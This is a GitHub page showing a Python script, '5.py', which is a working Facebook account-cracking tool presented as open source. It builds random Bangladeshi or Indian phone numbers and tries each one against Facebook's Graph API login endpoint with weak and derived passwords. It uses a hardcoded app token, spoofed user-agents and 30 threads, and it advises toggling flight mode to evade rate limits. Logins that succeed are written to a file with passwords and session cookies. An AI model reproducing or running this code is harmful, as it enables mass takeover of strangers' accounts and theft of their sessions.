-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy path5.py
More file actions
115 lines (115 loc) · 8.41 KB
/
5.py
File metadata and controls
115 lines (115 loc) · 8.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
#-----------------------[ INFO-CODE ]-----------------------#
"""Open By : Tanim Hossain [BHOOT-CYBER]
Developer : Tanim Hossain
Github : Bhoot-Cyber-143
Status : Open Source"""
#-----------------------[ IMPORT-CODE ]-----------------------#
import os
import sys
import marshal, base64, zlib
from os import path
import os,base64,zlib,pip,urllib
try:
os.system('clear')
import os,requests,json,time,re,random,sys,uuid,string,subprocess
from string import *
from concurrent.futures import ThreadPoolExecutor as tred
except ModuleNotFoundError:
os.system('pip install requests futures==2 > /dev/null')
except:pass
#-----------------------[ COLOR-CODE ]-----------------------#
a='\x1b[38;5;118m';b='\x1b[38;5;119m';c='\x1b[38;5;120m';d='\x1b[38;5;121m';e='\x1b[38;5;122m';g='\x1b[38;5;46m';r='\x1b[38;5;196m';w='\033[1;37m'
#-----------------------[ HEXXX-CODE ]-----------------------#
user=[];ok=[];cp=[];twf=[];cpx=[];cokix=[];plist=[];loop=0
#-----------------------[ SC-CODE ]-----------------------#
main_x = '(1) Bd Random \n (2) India random \n (3) Exit menu';bd_x = '017 | 018 | 019';ind_x = '+91639 | +91600 | +91620';line_x = '==================================================';cp_x = 'Do You Went Show Cp Ids (Y|N)';coki_x = 'Do You Went Show Cookies (Y|N)';c = 'Choice'
#-----------------------[ LOGO-CODE ]-----------------------#
logo = f"""{w}
dMMMMb dMP dMP .aMMMb .aMMMb dMMMMMMP \n dMP"dMP dMP dMP dMP"dMP dMP"dMP dMP \n dMMMMK" dMMMMMP dMP dMP dMP dMP dMP \n dMP.aMF dMP dMP dMP.aMP dMP.aMP dMP \n dMMMMP" dMP dMP VMMMP" VMMMP" dMP
{line_x}\n (+) Developer : Bhoot Cyber\n (+) Facebook : Tanim Hossain\n (+) Github : Bhoot Cyber 143\n (+) Status : Open Source\n{line_x}"""
#-----------------------[ CLEAR-CODE ]-----------------------#
def fresh():os.system('clear');print(logo)
#-----------------------[ LINE-CODE ]-----------------------#
def line():print(f'{line_x}')
#-----------------------[ MAIN-CODE ]-----------------------#
def Main():
fresh();print(f' (1) Random Cracking \n (2) Help Senter \n (3) Exit Manu ');line()
manu = input(f' (+) {c} : ')
if manu in ['1','01']:country()
elif manu in ['2','02']:os.system('xdg-open https://www.facebook.com/cyber.king.tanim');Main()
else:Main()
#-----------------------[ COUNTRY-CODE ]-----------------------#
def country():
fresh();print(f' {main_x} ');line()
con_ck = input(f' (+) {c} : ')
if con_ck in ['1','01']:rndm_bd()
elif con_ck in ['2','02']:rndm_ind()
else:Main()
#-----------------------[ RNDM-CODE-BD ]-----------------------#
def rndm_bd():
fresh();print(f' (+) Example : {bd_x} ');line();code = input(f' (+) Find Sim Code : ')
fresh();print(f' (+) Example : 1000 | 2000 | 5000 ');line();limit = int(input(f' (+) Find Limit : '))
fresh();print(f' (+) {cp_x} ');line();cpy = input(f' (+) {c} (Y|N) : ')
if cpy in ['n','N','no','NO','2','02']:cpx.append(f'n')
else:cpx.append(f'y')
fresh();print(f' (+) {coki_x} ');line();cokiy = input(f' (+) {c} (Y|N) : ')
if cokiy in ['n','N','no','NO','2','02']:cokix.append(f'n')
else:cokix.append(f'y')
for Kid in range(limit):Bhootxx = ''.join(random.choice(string.digits) for _ in range(7));user.append(Bhootxx)
with tred(max_workers=30) as Tanim:
tl = str(len(user))
fresh();print(f' (+) Sim Code : {code} \n (+) Total Limit : {limit} \n (+) Use Flight Mode Every 5 Minutes...');line()
for love in user:
ids = code + love
pasx = [love,ids,ids[:8],ids[:7],'@@@###','aabbcc','aaabbb','১২৩৪৫৬','১২৩৪৫৬৭৮','102030','405060','708090']
Tanim.submit(rndmx,ids,pasx,tl)
#-----------------------[ RNDM-CODE-INDIA ]-----------------------#
def rndm_ind():
fresh();print(f' (+) Example : {ind_x} ');line();code = input(f' (+) Find Sim Code : ')
fresh();print(f' (+) Example : 1000 | 2000 | 5000 ');line();limit = int(input(f' (+) Find Limit : '))
fresh();print(f' (+) {cp_x} ');line();cpy = input(f' (+) {c} (Y|N) : ')
if cpy in ['n','N','no','NO','2','02']:cpx.append(f'n')
else:cpx.append(f'y')
fresh();print(f' (+) {coki_x} ');line();cokiy = input(f' (+) {c} (Y|N) : ')
if cokiy in ['n','N','no','NO','2','02']:cokix.append(f'n')
else:cokix.append(f'y')
for Kid in range(limit):Bhootxx = ''.join(random.choice(string.digits) for _ in range(7));user.append(Bhootxx)
with tred(max_workers=30) as Tanim:
tl = str(len(user))
fresh();print(f' (+) Sim Code : {code} \n (+) Total Limit : {limit} \n (+) Use Flight Mode Every 5 Minutes...');line()
for love in user:
ids = code + love
pasx = ['57575751','57273200','59039200',ids,love,ids[3:]]
Tanim.submit(rndmx,ids,pasx,tl)
#-----------------------[ RANDOM-METHOD-CODE ]-----------------------#
def rndmx(ids,pasx,tl):
global loop,ok
sys.stdout.write(f'\r{w} (Finding) ({loop}) ({str(ids)}) ({len(ok)}|{len(cp)})');sys.stdout.flush()
try:
for pas in pasx:
accees_token = '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
random_seed = random.Random()
uaddx = f'[FBAN/FB4A;FBAV/'+str(random.randint(11,99))+'.0.0.'+str(random.randint(1111,9999))+';FBBV/'+str(random.randint(1111111,9999999))+';[FBAN/FB4A;FBAV/419.0.0.27.57;FBBV/573810848;FBRV/0;FBPN/com.facebook.katana;FBLC/vi_VN;FBMF/Era 2X;FBBD/Era 2X;FBDV/XOLO;FBSV/10;FBCA/armeabi-v8a:armeabi;FBDM/{density=2.0,width=720,height=1440};FB_FW/1;]'
data = {'adid':str(uuid.uuid4()),'format':'json','device_id':str(uuid.uuid4()),'email':ids,'password':pas,'generate_analytics_claims':'1','community_id':'','cpl':'true','try_num':'1','family_device_id':str(uuid.uuid4()),'credentials_type':'password','source':'login','error_detail_type':'button_with_disabled','enroll_misauth':'false','generate_session_cookies':'1','generate_machine_id':'1','currently_logged_in_userid':'0','locale': 'en_GB','client_country_code': 'GB','fb_api_req_friendly_name':'authenticate','api_key':'62f8ce9f74b12f84c123cc23437a4a32','access_token':accees_token}
headers = {'User-Agent': uaddx, 'Accept-Encoding': 'gzip, deflate', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': str(random.randint(20000, 40000)), 'X-FB-SIM-HNI': str(random.randint(20000, 40000)), 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=62f8ce9f74b12f84c123cc23437a4a32', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': '62f8ce9f74b12f84c123cc23437a4a32'}
url = 'https://graph.facebook.com/auth/login'
po = requests.post(url,data=data,headers=headers).json()
if 'session_key' in po:
uid = po['uid']
print(f'\r{g} (Running) {str(uid)} | {pas} ')
coki = ';'.join(i['name']+'='+i['value'] for i in po['session_cookies'])
if 'y' in cokix:print(f'\r{g} (Kid) : {coki} ')
open('/sdcard/BHOOT-RNDM-OK.txt','a').write(str(uid)+'|'+pas+'|'+coki+'\n')
ok.append(str(uid))
break
elif 'www.facebook.com' in po['error']['message']:
uid = po['error']['error_data']['uid']
if 'y' in cpx:print(f'\r{r} (Fucking) {str(uid)} | {pas} ')
open('/sdcard/BHOOT-RNDM-CP.txt','a').write(str(uid)+'|'+pas+'\n')
cp.append(str(uid))
break
else:continue
loop+=1
except:pass
#-----------------------[ END-CODE ]-----------------------#
Main()